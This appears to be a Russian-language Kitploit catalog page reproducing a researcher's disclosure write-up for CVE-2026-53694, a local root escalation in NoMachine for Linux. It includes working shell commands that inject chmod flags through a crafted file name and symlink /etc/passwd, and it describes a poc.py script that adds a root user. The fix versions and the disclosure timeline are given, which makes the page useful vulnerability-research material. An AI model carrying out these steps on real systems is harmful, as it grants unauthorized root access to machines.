Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-53694-NoMachine-LPE — Эксплойт доказательства концепции и описание для CVE-2026-53694, локальное повышение привилегий в NoMachine для Linux через внедрение аргументов в nxchmod.sh, позволяющее получить доступ root с помощью манипуляции символическими ссылками. | Kitploit
Инструменты/GitHubGitHub/do4choo/cve-2026-53694-nomachine-lpe
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubdo4choo/cve-2026-53694-nomachine-lpe

CVE-2026-53694-NoMachine-LPE

Эксплойт доказательства концепции и описание для CVE-2026-53694, локальное повышение привилегий в NoMachine для Linux через внедрение аргументов в nxchmod.sh, позволяющее получить доступ root с помощью манипуляции символическими ссылками.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 месяц назадЕщё не проверено

CVE-2026-53694: Повышение привилегий в NoMachine через внедрение аргументов

CVE Status Target Language

Обзор

Этот репозиторий содержит описание и Proof of Concept (PoC) для CVE-2026-53694 — уязвимости локального повышения привилегий (LPE) в NoMachine для Linux.

Из-за неправильной нейтрализации разделителей аргументов в скрипте nxchmod.sh локальный непривилегированный пользователь может внедрить аргументы в системную команду, выполняемую от имени root. Комбинируя эту инъекцию аргументов с символической ссылкой, атакующий может перезаписать критически важные системные файлы (например, /etc/passwd) и повысить свои привилегии до root.

Данная уязвимость полностью исправлена разработчиком.

Процесс обнаружения

Обнаружение этой уязвимости было процессом проб, ошибок и ночного озарения. Вот как разворачивалось открытие:

  1. Наблюдение за целью: Я заметил, что скрипт /usr/NX/scripts/restricted/nxchmod.sh периодически выполнялся от имени root для управления правами доступа в определённых каталогах.
  2. Первая идея (тупик): Я увидел, что скрипт применял chmod a+rw к файлам. Я подумал: Если я контролирую путь назначения, могу ли я с помощью симлинка сделать /etc/passwd доступным для записи? Я протестировал обычную символическую ссылку (ln -s /etc/passwd /tmp/asdf), но она не сработала. Sticky-бит Linux в таких каталогах, как /tmp, предотвращает слепое следование символической ссылке, созданной другим пользователем, даже для root.
  3. Прорыв: Позже, просматривая выполнение скрипта, я заметил, как строилась команда: ${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}. Скрипт брал буквальное имя файла и передавал его напрямую в chmod.
  4. Инъекция команды через имя файла: Я понял, что могу создать файл с пробелами и флагами в имени. Я создал файл с именем X1234 -R -L. Когда скрипт запускался, команда chmod разворачивала это в аргументы, а не в одиночный путь к файлу.
  5. Обход sticky-бита: Внедряя флаги -L (следовать симлинкам) и (рекурсивно) в команду через имя файла, я заставил сам бинарник разрешить и пройти по созданной мной символической ссылке в каталоге, полностью обходя защиту sticky-бита.

Технический анализ

Уязвимость возникает из-за того, как NoMachine обрабатывает права доступа для сокетов X11/Wayland. Скрипт nxchmod.sh запускается демоном nxserver.bin, работающим от имени root.

Уязвимое выполнение выглядит так:

root@kitploit:~
# /usr/NX/scripts/restricted/nxchmod.sh
${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}

Если атакующий создаёт структуру каталогов и файл с именем X1234 -R -L, итоговая команда, выполняемая root, становится: /bin/chmod a+rw /tmp/.X11-unix/X1234 -R -L

Когда символическая ссылка, указывающая на /etc/passwd, помещается в каталог X1234, внедрённые аргументы -R и -L заставляют chmod рекурсивно пройти по симлинку и предоставить глобальные права на чтение/запись целевому файлу.

Требования для эксплуатации

Для успешной эксплуатации целевая система должна соответствовать следующим условиям:

  • ОС должна использовать Wayland (а не X11).
  • Xwayland должен быть активен.
  • Должна быть запущена графическая сессия (достаточно экрана входа в систему).

Proof of Concept

Вы можете воспроизвести эту уязвимость либо вручную с помощью команд оболочки, либо автоматически с помощью предоставленного скрипта на Python.

Метод 1: Ручное выполнение (оболочка)

Перейдите в /tmp/.X11-unix/ и выполните следующие команды для создания вредоносной структуры каталогов.

root@kitploit:~
cd /tmp/.X11-unix/

# 1. Настройка эксплуатации
touch "X1234 -R -L"
mkdir X1234
ln -s /etc/passwd /tmp/.X11-unix/X1234/pwn

# Дождитесь выполнения nxchmod.sh (может занять до 60 секунд).
# Проверьте, что права доступа /etc/passwd изменились на -rw-rw-rw-
# Теперь вы можете отредактировать /etc/passwd, чтобы добавить root-пользователя.

После того как вы подтвердили уязвимость и повысили привилегии, выполните следующие команды очистки для восстановления стабильности системы и удаления артефактов:

root@kitploit:~
# 2. Очистка
rm "X1234 -R -L"
unlink X1234/pwn
rmdir X1234
chmod 644 /etc/passwd

Метод 2: Автоматизированный эксплойт

Полный автоматизированный эксплойт предоставлен в poc.py. Этот скрипт проверяет требования Wayland, настраивает симлинк, ожидает цикла выполнения nxchmod.sh и добавляет нового root-пользователя (gg) в /etc/passwd.

Для запуска эксплойта:

root@kitploit:~
python3 poc.py

Устранение

Эта уязвимость была устранена компанией NoMachine. Пользователям следует обновиться до следующих версий или более новых:

  • NoMachine 9.5.7
  • NoMachine 8.23.2

Хронология

  • 2026-04-20: Уязвимость сообщена разработчику.
  • 2026-04-23: Разработчик подтвердил уязвимость и согласился на координированное раскрытие.
  • 2026-05-07: Разработчик выпустил исправленные версии (9.5.7 и 8.23.2) и опубликовал Trouble Report TR04X11802.
  • 2026-06-10: CVE-2026-53694 опубликована в NVD. (Официальная запись MITRE в настоящее время ожидает полного анализа и обновления информации об авторах (последняя проверка: 2026-07-01))

Ссылки

  • NoMachine Trouble Report TR04X11802
  • NoMachine Software Update SU05X00274
  • NoMachine Software Update SU05X00275
  • NVD - CVE-2026-53694
Скачать инструмент
-R
chmod
chmod
  • Достижение LPE: Как только /etc/passwd стал доступен для записи (a+rw), я просто добавил нового root-пользователя в файл и выполнил su для входа.